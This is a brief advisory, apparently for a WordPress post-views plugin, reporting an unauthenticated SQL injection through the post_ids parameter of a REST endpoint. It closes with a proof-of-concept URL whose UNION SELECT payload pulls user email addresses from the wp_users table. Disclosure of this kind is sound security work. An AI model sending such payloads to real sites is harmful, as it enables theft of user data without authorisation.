The plugin does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint, available to both unauthenticated and authenticated users. As a result, unauthenticated attackers could perform SQL injection attacks
https://example.com/?rest_route=/pvc/v1/increase/1&post;_ids=0)%20union%20select%20user_email,user_email,user_email%20from%20wp_users%20–%20g